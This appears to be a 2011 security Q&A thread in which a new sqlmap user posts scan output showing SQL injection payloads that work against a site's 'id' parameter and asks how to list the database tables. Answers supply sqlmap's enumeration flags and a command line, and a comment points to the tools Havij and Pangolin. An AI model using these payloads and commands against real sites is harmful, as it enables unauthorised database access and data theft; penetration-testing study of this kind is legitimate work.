8

I'm just started using sqlmap to test for possible SQL injection attacks.

I have got a website which is vulnerable:

C:\Python27>python xxx\sqlmap\sqlmap.py -u http://www.example.com/page.php?id=1 [*] starting at: 19:33:27 [19:33:27] [INFO] using 'xxx\session' as session file [19:33:27] [INFO] testing connection to the target url [19:33:31] [INFO] testing if the url is stable, wait a few seconds [19:33:33] [INFO] url is stable [19:33:33] [INFO] testing if GET parameter 'id' is dynamic [19:33:33] [INFO] confirming that GET parameter 'id' is dynamic [19:33:34] [INFO] GET parameter 'id' is dynamic [19:33:35] [INFO] heuristic test shows that GET parameter 'id' might be injectab le (possible DBMS: MySQL) [19:33:35] [INFO] testing sql injection on GET parameter 'id' [19:33:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [19:33:39] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI NG clause' injectable [19:33:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [19:33:39] [INFO] testing 'MySQL > 5.0.11 stacked queries' [19:33:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [19:34:40] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' in jectable [19:34:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [19:34:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y sqlmap identified the following injection points with a total of 29 HTTP(s) requ ests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 3404=3404 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --- [19:34:55] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.2.15 back-end DBMS: MySQL 5.0.11 [19:34:55] [WARNING] HTTP error codes detected during testing: 403 (Forbidden) - 21 times [19:34:55] [INFO] Fetched data logged to text files under 'xxx\output\www.example.com' [*] shutting down at: 19:34:55

Now I would like to find out whether it is possible to see if I for example can see all the tables in the database.

What do I have to type in the command line to check this?

Improve this question
3
  • 1
    Just use Havij or Pangolin. You should try to read a manual, or to type --help for help with a command. This is why I'm also downvoting you.
    – atdre
    CommentedJun 13, 2011 at 19:43
  • Why the profanity? I just didn't realize that the options are called enumeration. ...
    – PeeHaa
    CommentedJun 13, 2011 at 19:48
  • 3
    whilst you are correct that this was a pretty much RTFM type question, please stick to the FAQ - be nice. Also such a comment (but nicer) would be more appropriate as a comment, not an answer. Besides, sometimes it is hard to find something when you don't know what you're looking for....
    – AviD
    CommentedJun 14, 2011 at 0:35

2 Answers 2

Reset to default
14

What you are asking to find out is called enumeration.

Reading the SQLMap manual under the enumeration topic provides me with the following information:

  • --dbs for databases
  • --tables for tables
  • --columns for columns

There is also a lot of other good information in the manual, so I suggest reading over it if you have more questions about flags and parameters the tool takes.

I've added a blog post about enumeration with SQLMap here: http://www.securesolutions.no/enumeration-with-sqlmap/

Improve this answer
    0

    oh you're so close, it's

    ./sqlmap.py -u http://example.com--tables

    Improve this answer
    0

      You must log in to answer this question.

      Start asking to get answers

      Find the answer to your question by asking.

      Ask question

      Explore related questions

      See similar questions with these tags.